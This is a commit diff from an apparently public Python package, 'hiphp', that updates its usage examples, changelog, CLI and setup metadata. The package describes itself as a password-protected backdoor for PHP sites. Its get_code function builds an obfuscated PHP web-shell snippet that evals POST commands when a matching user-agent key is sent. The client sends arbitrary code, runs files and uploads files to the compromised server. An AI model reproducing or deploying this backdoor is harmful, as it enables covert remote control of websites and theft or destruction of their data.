-
Boudjada Yasser
committed
with
GitHub
3 years ago
1 parent c9b1d006
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
-
-
-
-
skipped 4 lines 5 5 ################################################################## 6 6 # USAGE : 7 7 #s 8 + #call the package: 8 9 from hiphp import hiphp 9 - p1=hiphp("<PASSWORD>","<http://THE/LINK/TO/THE/PHP/FILE/THAT/CONTAINS/THE/HIPHP/ID>",False) #In order to print the result directly. 10 - #p1=hiphp("<PASSWORD>","<http://THE/LINK/TO/THE/PHP/FILE/THAT/CONTAINS/THE/HIPHP/ID>") #In order to make the result as a variable. 11 - print(p1.get_code()) #Get HIPHP ID for first use. 12 - p1.run("<YOUR_CODE>") #Run a code or line in your website. 13 - p1.run_file("<PHP_CODE_FILE_PATH>") #Run a code or line in your website from a file. 14 - p1.run_file("<PHP_CODE_FILE_PATH>","<__VALUE_NAME__>==<VALUE_CONTENT>") #Run a code or line in your website from a file With the entry of variables. 15 - p1.cli() #open command panel 16 - p1.upload("<THE_PATH_OF_THE_FILE_TO_BE_UPLOADED>") #Upload a file to the server hosting the site. 10 + # 11 + # 12 + #In order to print the result directly. 13 + p1=hiphp("<PASSWORD>","<http://THE/LINK/TO/THE/PHP/FILE/THAT/CONTAINS/THE/HIPHP/ID>",False) 14 + # 15 + #In order to make the result as a variable. 16 + #p1=hiphp("<PASSWORD>","<http://THE/LINK/TO/THE/PHP/FILE/THAT/CONTAINS/THE/HIPHP/ID>") 17 + # 18 + # 19 + #Get HIPHP ID for first use. 20 + print(p1.get_code()) 21 + # 22 + # 23 + #Run a code or line in your website. 24 + p1.run("<YOUR_CODE>") 25 + # 26 + #Run a code or line in your website from a file. 27 + p1.run_file("<PHP_CODE_FILE_PATH>") 28 + # 29 + #Run a code or line in your website from a file With the entry of variables. 30 + p1.run_file("<PHP_CODE_FILE_PATH>","<__VALUE_NAME__>==<VALUE_CONTENT>") 31 + # 32 + # 33 + #open command line interface. 34 + p1.cli() 35 + # 36 + # 37 + #Upload a file to the server hosting the site. 38 + p1.upload("<THE_PATH_OF_THE_FILE_TO_BE_UPLOADED>") 39 + # 40 + #Upload a file to a specific folder in the server hosting the site. 17 41 p1.upload("<THE_PATH_OF_THE_FILE_TO_BE_UPLOADED>","./<THE_PATH_YOU_WANT_TO_UPLOAD_THE_FILE_TO>") 18 42 #e 19 43 ################################################################## 20 44 # EXAMPLES : 21 45 #s 22 46 from hiphp import hiphp 47 + # 48 + # 23 49 p1=hiphp("123","http://localhost/index.php",False) 24 - 50 + # 51 + # 52 + # 25 53 # Example:1 26 54 # GET ID: 27 55 print(p1.get_code()) skipped 5 lines 33 61 ''' 34 62 # Copy this code into the file whose path you entered earlier. 35 63 # for example: https://localhost/index.php 36 - 64 + # 65 + # 66 + # 37 67 # Example:2 38 68 # Command: 39 69 p1.run("echo 'this is a test';") skipped 1 lines 41 71 ''' 42 72 this is a test 43 73 ''' 44 - 74 + # 75 + # 76 + # 45 77 # Example:3 46 78 # Run code from file: 47 79 #-example_3.php content: skipped 11 lines 59 91 ''' 60 92 this is a test 61 93 ''' 62 - 94 + # 95 + # 96 + # 63 97 # Example:4 64 98 # Run code from file With the entry of variables: 65 99 #-example_4.php content: skipped 11 lines 77 111 ''' 78 112 this is a test 79 113 ''' 80 - 114 + # 115 + # 116 + # 81 117 # Example:5 82 118 # Command line interface: 83 119 p1.cli() skipped 1 lines 85 121 ''' 86 122 hiphp>>> 87 123 ''' 88 - 124 + # 125 + # 126 + # 89 127 # Example:6 90 128 # Upload a picture: 91 129 p1.upload("picture_example.png") 92 - 130 + # 131 + # 132 + # 93 133 # Example:7 94 134 # Upload a picture to a specific path: 95 135 p1.upload("picture_example.png","./pictures/") skipped 1 lines 97 137 ################################################################## 98 138 # CHANGELOG : 99 139 #s 140 + # 141 + ## 0.1.13 142 + - safety upgrade. 143 + - Bug fixes & performance improvements. 144 + # 145 + ## 0.1.12 146 + - safety upgrade. 147 + - Bug fixes & performance improvements. 148 + # 100 149 ## 0.1.11 101 150 - Command interface update. 102 151 - Bug fixes & performance improvements. 103 - 152 + # 104 153 ## 0.1.10 105 154 - Fix Bugs. 106 - 155 + # 107 156 ## 0.1.9 108 157 - fix bugs. 109 - 158 + # 110 159 ## 0.1.7 111 160 - fix bugs. 112 - 161 + # 113 162 ## 0.1.6 114 163 - fix bugs. 115 164 - add upload to upload any file. 116 165 - Simplify the use of the program. 117 - 166 + # 118 167 ## 0.1.5 119 168 - fix bugs. 169 + # 120 170 ## 0.1.4 121 171 - fix bugs. 122 172 - new build. 123 - 173 + # 124 174 ## 0.1.1 125 175 - Import pakages by pipincluder. 126 176 - Fix bugs. 127 - 177 + # 128 178 ## 0.1.0 129 179 - New build. 130 180 - Fix bugs. 131 - 181 + # 132 182 ## 0.0.4 133 183 - Fix bugs. 134 - 184 + # 135 185 ## 0.0.2 136 186 - Fix bugs. 137 187 - Add help list. 138 188 - Add Executing from files. 139 - 189 + # 140 190 ## 0.0.1 141 191 - First public release. 142 192 #e 143 193 ################################################################## 144 194 """ 145 195 # VALUES : 146 - __version__="0.1.11" 196 + __version__="0.1.13" 147 197 __name__="hiphp" 148 198 __author__="Yasser Bdj (Boudjada Yasser)" 149 199 __author_email__="[email protected]" 150 200 __github_user_name__="yasserbdj96" 151 201 __title__="hiphp for control php websites." 152 - __description__="A package for controlling a php-based website." 202 + __description__="backdoor control php sites, The site is controlled by sending commands, files and codes to the site using the http or https protocol. After copying the code and placing it in any php file on the target website, you will have permissions to enter it, read all files, delete and even upload new files to it. Also, this backdoor is password protected and non-reverse encryption." 153 203 __author_website__=f"https://{__github_user_name__}.github.io/" 154 204 __source_code__=f"https://github.com/{__github_user_name__}/{__name__}" 155 205 __keywords__=[__github_user_name__,'python'] 156 206 __keywords__.extend(__title__.split(" ")) 157 207 __keywords__.extend(__description__.split(" ")) 158 - __install_requires__=["pipincluder",'requests','ashar','hexor'] 208 + __install_requires__=["pipincluder"] 159 209 __Installation__="pip install "+__name__+"=="+__version__ 160 210 __license__='MIT License' 161 211 __copyright__='Copyright © 2008->Present, '+__author__+"." skipped 24 lines 186 236 "from ashar import ashar", 187 237 "from hexor import hexor", 188 238 "import re,base64,os", 189 - "import yasserbdj96").modules()) 239 + "import yasserbdj96", 240 + "import time").modules()) 190 241 191 242 #start hiphp class: 192 243 class hiphp: 193 244 #__init__: 194 245 def __init__(self,key,url,returns=True): 246 + self.start=time.time() 247 + 195 248 self.pp=key 196 249 self.key=ashar(key,key).encode() 197 250 self.url=url skipped 2 lines 200 253 self.print2=hexor(True) 201 254 self.returns=returns 202 255 256 + self.cc1="#ea4335"#red 257 + self.cc2="#f3938b"#white-red 258 + self.cc3="#4285f4"#bleu 259 + self.cc4="#fbbc05"#yallew 260 + self.cc5="#34a853"#green 261 + 203 262 #run: 204 263 def run(self,command): 205 264 if self.returns==True: 206 - return hiphp.do(self.url,self.headers,command,self.returns) 265 + return hiphp.do(self.url,self.headers,command,self.returns,self.key) 207 266 else: 208 - hiphp.do(self.url,self.headers,command,self.returns) 267 + hiphp.do(self.url,self.headers,command,self.returns,self.key) 209 268 210 269 #logo: 211 270 def logo(self): 212 271 p1=hexor(True,"hex") 213 272 p2=hexor(False,"hex") 214 273 215 - logo=""" 216 - ██╗ ██╗██╗██████╗ ██╗ ██╗██████╗ 217 - ██║ ██║██║██╔══██╗██║ ██║██╔══██╗ 218 - ███████║██║██████╔╝███████║██████╔╝ 219 - ██╔══██║██║██╔═══╝ ██╔══██║██╔═══╝ 220 - ██║ ██║██║██║ ██║ ██║██║ 221 - ╚═╝ ╚═╝╚═╝╚═╝ ╚═╝ ╚═╝╚═╝""" 274 + spas=" "*1 275 + logo=f""" 276 + {spas} ▄█ █▄ ▄█ ▄███████▄ ▄█ █▄ ▄███████▄ 277 + {spas} ███ ███ ███ ███ ███ ███ ███ ███ ███ 278 + {spas} ███ ███ ███▌ ███ ███ ███ ███ ███ ███ 279 + {spas} ▄███▄▄▄▄███▄▄ ███▌ ███ ███ ▄███▄▄▄▄███▄▄ ███ ███ 280 + {spas}▀▀███▀▀▀▀███▀ ███▌ ▀█████████▀ ▀▀███▀▀▀▀███▀ ▀█████████▀ 281 + {spas} ███ ███ ███ ███ ███ ███ ███ 282 + {spas} ███ ███ ███ ███ ███ ███ ███ 283 + {spas} ███ █▀ █▀ ▄████▀ ███ █▀ ▄████▀ 284 + """ 222 285 223 286 s=[] 224 - arr=["╦:::#7e4367","╚:::#7e4367","╝:::#7e4367","╩:::#7e4367","╔:::#7e4367","╗:::#7e4367","╠:::#7e4367","═:::#7e4367","║:::#7e4367", 225 - "╣:::#7e4367","█:::#db61a2"] 287 + arr=[f"█:::{self.cc1}",f"▄:::{self.cc1}",f"▀:::{self.cc1}",f"▐:::{self.cc1}",f"▌:::{self.cc1}"] 226 288 for i in range(len(arr)): 227 289 s.append(p1.c(arr[i].split(":::")[0],arr[i].split(":::")[1])) 228 290 logo=logo.replace(arr[i].split(":::")[0],s[i]) 229 291 230 292 print(logo) 231 293 print(yasserbdj96.about(__version__)) 232 - print("\n") 294 + #print("\n") 233 295 234 - s1=p1.c("[","#db61a2") 235 - s2=p1.c("*","#7e4367") 236 - s3=p1.c("*","#db61a2") 237 - s4=p1.c("]","#db61a2") 238 - print(s1+s2+s3+s2+s4+p1.c(f" Contacting to '{self.url}' ........","#f7df1e")+p1.c("[done!]","#94c856")) 296 + s1=p1.c("[",f"{self.cc1}") 297 + s2=p1.c("*",f"{self.cc2}") 298 + s3=p1.c("*",f"{self.cc1}") 299 + s4=p1.c("]",f"{self.cc1}") 239 300 240 - print("\n") 241 - p2.c(" - You are now connected safety. You can print the PHP commands below for comprehensive control of the site.","#db61a2") 242 - p2.c(" - If you are having difficulties controlling the program, you can type '--help'","#f34f29") 243 - p2.c(" - Ctrl+C for exit :)","#f34f29") 301 + end=time.time() 302 + seconds=str(end-self.start) 303 + seconds=p1.c(" in "+seconds[0:4]+"s",f"{self.cc2}") 244 304 245 - print("\n") 305 + #print(s1+s2+s3+s2+s4+p1.c(f" Contacting to '{self.url}' ........",f"{self.cc4}")+p1.c("[done!]",f"{self.cc5}")+seconds) 306 + 307 + p2.c("\n - You are now connected safety. You can print the PHP commands below for comprehensive control of the site.",f"{self.cc3}") 308 + p2.c(" - If you are having difficulties controlling the program, you can type '--help' for more informations.",f"{self.cc4}") 309 + p2.c(" - Ctrl+C for exit :)\n",f"{self.cc4}") 246 310 247 311 #cli: 248 312 def cli(self,see=True): 313 + 249 314 p1=hexor(True,"hex") 250 315 if see==True: 251 316 hiphp.logo(self) 252 317 if os.name == 'nt': 253 - ch="@" 318 + ch=p1.c("@",f'{self.cc1}') 319 + "@" 254 320 else: 255 321 ch="💀" 256 322 257 - p=hiphp(self.pp,self.url,True).run("echo getcwd();") 258 - print("┌──("+p1.c(f'hiphp{ch}{self.url}',"#db61a2")+f")──[{p1.c(p,'#db61a2')}]") 259 - command=input("└─>") 323 + 324 + 325 + p=p1.c(hiphp(self.pp,self.url,True).run("echo getcwd();"),f'{self.cc1}') 326 + 327 + id_url=p1.c(f'{self.key[0:10]}',f'{self.cc4}')+ch+p1.c(f'{self.url}',f'{self.cc5}') 328 + 329 + xxr1=p1.c('┌──(',f'{self.cc3}') 330 + xxr2=p1.c(')──[',f'{self.cc3}') 331 + xxr3=p1.c(']',f'{self.cc3}') 332 + xxr4=p1.c('└─>',f'{self.cc3}') 333 + 334 + print(xxr1+id_url+xxr2+p+xxr3) 335 + command=input(xxr4) 260 336 if command: 261 337 if command=="--help": 262 338 print("-rf <PHP_CODE_FILE_PATH> | # Run a code or line in your website from a file.") 263 339 print("-up <THE_PATH_OF_THE_FILE_TO_BE_UPLOADED> | # Upload a file to the server hosting the site.") 264 - print("-up <FILE_PATH> ./<THE_PATH_YOU_WANT_TO_UPLOAD_THE_FILE_TO>") 340 + print("-up <FILE_PATH> ./<THE_PATH_YOU_WANT_TO_UPLOAD_THE_FILE_TO>/") 265 341 elif command[0:3]=="-rf": 266 342 hiphp.run_file(self,command[4:len(command)]) 267 343 elif command[0:3]=="-up": 268 344 try: 269 345 file,to=command[4:len(command)].split(" ") 346 + if to[len(to)-1:len(to)]!="/": 347 + to=to+"/" 270 348 hiphp.upload(self,file,to) 271 349 except: 272 350 hiphp.upload(self,command[4:len(command)]) 273 351 elif command[0:3]=="-gc": 274 352 print(hiphp.get_code(self)) 275 353 else: 276 - hiphp.do(self.url,self.headers,command,self.returns) 354 + hiphp.do(self.url,self.headers,command,self.returns,self.key) 277 355 else: 278 356 print(p1.c("Command not found!","#ff5b3c")) 279 357 hiphp.cli(self,False) skipped 11 lines 291 369 open_file=open_file.replace(f"__{value}__",string) 292 370 293 371 if self.returns==True: 294 - return hiphp.do(self.url,self.headers,open_file,self.returns) 372 + return hiphp.do(self.url,self.headers,open_file,self.returns,self.key) 295 373 else: 296 - hiphp.do(self.url,self.headers,open_file,self.returns) 374 + hiphp.do(self.url,self.headers,open_file,self.returns,self.key) 297 375 except: 298 376 self.print.c("The file you entered does not exist.","#ff5b3c") 299 377 skipped 9 lines 309 387 self.print.c(f"We could not read the file {path_to_upluad}","#ff5b3c") 310 388 311 389 #do: 312 - def do(url,headers,command,returns): 390 + def do(url,headers,command,returns,key): 313 391 response=requests.post(url,headers=headers) 314 392 if response.status_code==200: 315 - if response.text[0:7]=="#python": 393 + key_len=len(key)+1 394 + if response.text[0:key_len]=="#"+key: 316 395 ploads={'command':command}#open('php.php').read() 317 396 response=requests.post(url,headers=headers,data=ploads) 318 397 if returns==True: 319 - return hiphp.check_errors(response.text[7:],returns) 398 + return hiphp.check_errors(response.text[key_len:],returns) 320 399 else: 321 - hiphp.check_errors(response.text[7:],returns) 400 + hiphp.check_errors(response.text[key_len:],returns) 322 401 else: 323 402 hexor().c("We were unable to recognize the hiphp identifier.","#ff5b3c") 403 + exit() 324 404 else: 325 405 hexor().c("We were unable to connect '"+url+"'.","#ff5b3c") 406 + exit() 326 407 327 408 #check_errors: 328 409 def check_errors(response,returns): skipped 14 lines 343 424 344 425 #Get_code: 345 426 def get_code(self): 346 - code="if($_SERVER['HTTP_USER_AGENT']=='"+self.key+"'){echo'#python';if(isset($_POST['command'])){eval($_POST['command']);}exit;}" 427 + code="if($_SERVER['HTTP_USER_AGENT']=='"+self.key+"'){echo'#"+self.key+"';if(isset($_POST['command'])){eval($_POST['command']);}exit;}" 347 428 code=hiphp.rot13(code) 348 429 code=ashar.tob64(code) 349 430 code=hiphp.rot13(code) skipped 6 lines -
1 1 from setuptools import setup,find_packages 2 2 setup( 3 3 name="hiphp", 4 - version="0.1.11", 4 + version="0.1.13", 5 5 author="Yasser Bdj (Boudjada Yasser)", 6 6 author_email="[email protected]", 7 - description='''A package for controlling a php-based website.''', 7 + description='''backdoor control php sites, The site is controlled by sending commands, files and codes to the site using the http or https protocol. After copying the code and placing it in any php file on the target website, you will have permissions to enter it, read all files, delete and even upload new files to it. Also, this backdoor is password protected and non-reverse encryption.''', 8 8 long_description_content_type="text/markdown", 9 9 long_description=open('README.md','r').read(), 10 10 license='''MIT License''', skipped 2 lines 13 13 project_urls={ 14 14 'Author WebSite': "https://yasserbdj96.github.io/", 15 15 }, 16 - install_requires=['pipincluder', 'requests', 'ashar', 'hexor'], 17 - keywords=['yasserbdj96', 'python', 'hiphp', 'for', 'control', 'php', 'websites.', 'A', 'package', 'for', 'controlling', 'a', 'php-based', 'website.'], 16 + install_requires=['pipincluder'], 17 + keywords=['yasserbdj96', 'python', 'hiphp', 'for', 'control', 'php', 'websites.', 'backdoor', 'control', 'php', 'sites,', 'The', 'site', 'is', 'controlled', 'by', 'sending', 'commands,', 'files', 'and', 'codes', 'to', 'the', 'site', 'using', 'the', 'http', 'or', 'https', 'protocol.', 'After', 'copying', 'the', 'code', 'and', 'placing', 'it', 'in', 'any', 'php', 'file', 'on', 'the', 'target', 'website,', 'you', 'will', 'have', 'permissions', 'to', 'enter', 'it,', 'read', 'all', 'files,', 'delete', 'and', 'even', 'upload', 'new', 'files', 'to', 'it.', 'Also,', 'this', 'backdoor', 'is', 'password', 'protected', 'and', 'non-reverse', 'encryption.'], 18 18 classifiers=[ 19 19 "Development Status :: 5 - Production/Stable", 20 20 "Intended Audience :: Developers", skipped 11 lines -